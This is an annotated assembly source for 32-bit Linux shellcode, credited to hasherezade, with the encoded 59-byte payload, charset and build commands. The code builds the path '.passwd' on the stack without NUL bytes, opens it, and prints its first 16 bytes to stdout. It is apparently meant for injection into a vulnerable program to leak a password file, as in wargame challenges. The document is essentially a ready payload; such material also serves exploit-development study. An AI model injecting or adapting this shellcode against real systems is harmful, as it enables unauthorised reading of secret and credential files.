read_file.asm

; shellcode reading and displaying 0x10 bytes of file: .passwd
; CC-BY: hasherezade
; shellcode (len=59)
; \xb8\x73\x77\x64\x30\xc1\xe0\x08\xc1\xe8\x08\x50\x68\x2e\x70\x61
; \x73\x31\xc0\x31\xc9\x89\xe3\xb0\x05\xcd\x80\x89\xe1\x93\x31\xc0
; \xb0\x03\x31\xd2\xb2\x10\xcd\x80\x89\xc3\x31\xc0\x31\xdb\xb0\x04
; \xfe\xc3\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80
; charset:
; 03 04 05 08 10 2e 30 31 40 50 61 64 68 70 73 77 80 89 93 b0 b2 b8 c0 c1 c3 c9 cd d2 d8 db e0 e1 e3 e8 fe
; compile:
; nasm -f elf32 test1.asm
; ld -m elf_i386 test1.o -o test1
global _start
section .text
; Entry point. Builds the NUL-terminated path ".passwd" on the stack and
; zeroes eax/ecx for the open() call; execution then falls through into
; open_file. Target: 32-bit Linux, system calls issued through int 0x80.
_start:
mov eax, 0x30647773 ; file_name (end): bytes 's','w','d' plus a filler '0' in the top byte
shl eax, 8 ; shift the filler byte out of the register ...
shr eax, 8 ; ... and bring a zero in: eax = "swd\0" without a NUL byte in the encoding
push eax ; second half of the path, including its terminator
push 0x7361702e ; file_name (beginning): ".pas"; esp now points at ".passwd\0"
xor eax, eax ; eax = 0 so the following `mov al, N` gives a clean syscall number
xor ecx, ecx ; ecx = 0, used as the flags argument of open (read only)
; open(path, flags): ebx = path, ecx = flags, eax = 5.
; Depends on eax and ecx having been zeroed before this label is reached.
; NOTE(review): the value returned in eax (a descriptor, or a negative errno
; on failure) is passed to the next step without being checked.
open_file:
mov ebx, esp ;file to open (file_name stored on the stack)
mov al, 5 ;open (syscall number 5)
; ecx = 0 ;read only mode
int 0x80
; read(fd, buf, 0x10): ebx = fd, ecx = buf, edx = 0x10, eax = 3.
; The buffer is the current top of the stack, i.e. the same 8 bytes that hold
; the path, plus the 8 bytes above them; the read overwrites all of them.
read:
mov ecx, esp ; store buffer address (top of stack, where the path was built)
xchg ebx, eax ; store fd for read(): ebx = value returned by open, eax = old ebx
xor eax,eax ; clear eax before loading the syscall number into al
mov al, 3 ; read() system call
xor edx, edx
mov dl, 0x10 ; buffer size: at most 0x10 bytes are read
int 0x80
; write(1, buf, 0x10): ebx = 1 (stdout), eax = 4; ecx and edx are not reloaded
; here and are expected to still hold the buffer address and 0x10 from the
; read step.
; NOTE(review): the byte count returned by read is copied to ebx and then
; discarded by the `xor ebx, ebx` two lines later, so 0x10 bytes of the stack
; buffer are written even when fewer were read or the read failed.
write:
mov ebx, eax ; copy of read's return value; overwritten below before any use
xor eax, eax
xor ebx, ebx
mov al, 0x4 ; write
inc bl ; descriptor=1 (stdout)
; edx = 0x10 ; buf size
int 0x80
; exit(0): ebx = 0 (status), eax = 1. The status is 0 regardless of whether
; the earlier open/read/write calls succeeded.
exit:
xor ebx,ebx ; status = 0
mov eax, ebx ; eax = 0 without a NUL byte in the encoding
inc eax ; 1 -> exit
int 0x80
section .data